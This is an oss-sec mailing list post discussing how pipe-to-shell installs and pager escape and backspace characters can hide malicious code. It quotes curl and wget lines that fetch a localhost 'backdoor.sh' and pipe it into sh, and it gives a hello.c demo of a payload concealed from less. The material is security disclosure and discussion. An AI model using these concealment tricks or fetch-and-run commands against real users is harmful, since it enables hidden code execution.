oss-sec mailing list archives
Re: s/party/hack like it's 1999
From: Jakub Wilk <jwilk () jwilk net>
Date: Thu, 21 Apr 2016 21:45:59 +0200
* up201407890 () alunos dcc fc up pt, 2015-09-17, 18:03:
$ curl 127.0.0.1/backdoor.sh #!/bin/bash echo doing something very nice! $ wget -qO - 127.0.0.1/backdoor.sh #!/bin/bash echo doing something very nice! But if we pipe it into a shell... $ curl -s 127.0.0.1/backdoor.sh|sh doing something evil! $ wget -qO - 127.0.0.1/backdoor.sh|sh doing something evil!You might be thinking "If I opened that in my browser, I would detect it being malicious!"Well, think again...One can have all sorts of fun with user-agents, something that can easily come to mind is verifying if the user-agent is from curl or wget,
...or this: https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/
'less' doesn't interpret escape sequences unless the -r switch is used, so stop aliasing it to 'less -r' just because there's no colored output.
As somebody else noted, it should be s/doesn't interpret/neutralizes/ or something. But that doesn't mean you should feel safe if you don't use -r.
For example, when git automatically spawns a pager, it puts R in the LESS environment variable. (That would be fine if git escaped \033 before passing them to the pager, but it doesn't. Oddly, it does seem to escape other control characters.) Now, -R is less convenient than -r for hiding malicious code, but you could still set foreground and background to black in hope that the victim's terminal background is also black.
But even without -r or -R, one can use backspace characters to hide evil payload:
| $ less -FX hello.c
| #include <stdio.h>
| #include <stdlib.h>
|
| int main(int argc, char **argv)
| {
| /* Copyright 2015-2016 Jakub Wilk */
| printf("Hello world!\n");
| return 0;
| }
|
| $ gcc -Wall hello.c -o hello && ./hello
| ________
| < ^H^H^H >
| --------
| \ ^__^
| \ (oo)\_______
| (__)\ )\/\
| ||----w |
| || ||
--
Jakub Wilk
Attachment:
hello.c
Description:
Current thread:
- Re: s/party/hack like it's 1999 Jakub Wilk (Apr 21)
- Re: s/party/hack like it's 1999 Solar Designer (Apr 21)